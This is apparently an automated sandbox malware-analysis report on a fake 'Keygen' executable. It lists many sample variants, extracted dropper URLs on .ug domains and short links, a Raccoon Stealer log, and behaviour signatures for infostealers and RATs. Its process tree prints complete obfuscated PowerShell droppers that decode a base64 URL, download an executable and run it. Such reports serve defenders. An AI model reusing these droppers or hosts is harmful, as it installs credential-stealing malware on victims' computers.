Overview

overview

10

Static

static

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

8

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

8

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...en.exe

windows7_x64

10

201001-nyh...en.exe

windows10_x64

10

Resubmissions

02-10-2020 21:14

201002-pjxdl9y6a6 10

01-10-2020 20:51

201001-e45lwcxsnn 10

01-10-2020 20:51

201001-fhxddb9gwe 10

01-10-2020 20:51

201001-ts8hns28ea 10

01-10-2020 20:51

201001-v1kt3kgljx 10

01-10-2020 20:51

201001-d2fbtjzv4s 10

01-10-2020 20:51

201001-cgj9prs442 10

01-10-2020 20:49

201001-t1jnpvwcgx 10

Analysis

  • max time kernel
    150s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    01-10-2020 20:51

General

  • Target

    201001-nyhbt4p25j_pw_infected/Keygen — копия (5).exe

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note
[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:02 2020 Launched at: 2020.10.02 - 04:17:05 GMT Bot_ID: BAE8C589-5DA1-4C62-BE46-F8D74908CB8C_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 0 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.51 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: AVGLFESB - Username: Admin - Windows version: NT 6.1 - Product name: Windows 7 Professional - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 2047 MB (453 MB used) - Screen resolution: 1280x720 - Display devices: 0) Standard VGA Graphics Adapter ============

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Contains code to disable Windows Defender 2 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon log file 1 IoCs

    Detects a log file produced by the Raccoon Stealer.

  • ModiLoader First Stage 3 IoCs
  • ModiLoader Second Stage 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 25 IoCs
  • Loads dropped DLL 49 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 1 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 6 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (5).exe
    "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (5).exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1240
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\535E.tmp\start.bat" "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — ????? (5).exe""
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:884
      • C:\Users\Admin\AppData\Local\Temp\535E.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:1064
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\535E.tmp\m.hta"
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:1424
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1596
          • C:\Users\Public\xlv.exe
            "C:\Users\Public\xlv.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            PID:2372
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:2552
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:2764
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 2764 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\173249800132574\\* & exit
                  8⤵
                    PID:2724
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /pid 2764
                      9⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2528
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:2580
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:2856
              • C:\Users\Public\xlv.exe
                "C:\Users\Public\xlv.exe"
                6⤵
                • Executes dropped EXE
                PID:2688
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\535E.tmp\m1.hta"
          3⤵
          • Modifies Internet Explorer settings
          • Suspicious use of WriteProcessMemory
          PID:1140
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1856
        • C:\Windows\SysWOW64\timeout.exe
          timeout 1
          3⤵
          • Delays execution with timeout.exe
          PID:1808
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\535E.tmp\b.hta"
          3⤵
          • Modifies Internet Explorer settings
          • Suspicious use of WriteProcessMemory
          PID:1912
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
            4⤵
            • Blocklisted process makes network request
            • Loads dropped DLL
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1540
            • C:\Users\Public\yfh.exe
              "C:\Users\Public\yfh.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2312
              • C:\Windows\SysWOW64\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs"
                6⤵
                • Loads dropped DLL
                PID:1228
                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                  "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of SetThreadContext
                  • Suspicious use of AdjustPrivilegeToken
                  PID:368
                  • C:\Windows\SysWOW64\WScript.exe
                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs"
                    8⤵
                    • Loads dropped DLL
                    PID:2096
                    • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                      "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                      9⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of SetThreadContext
                      • Suspicious use of AdjustPrivilegeToken
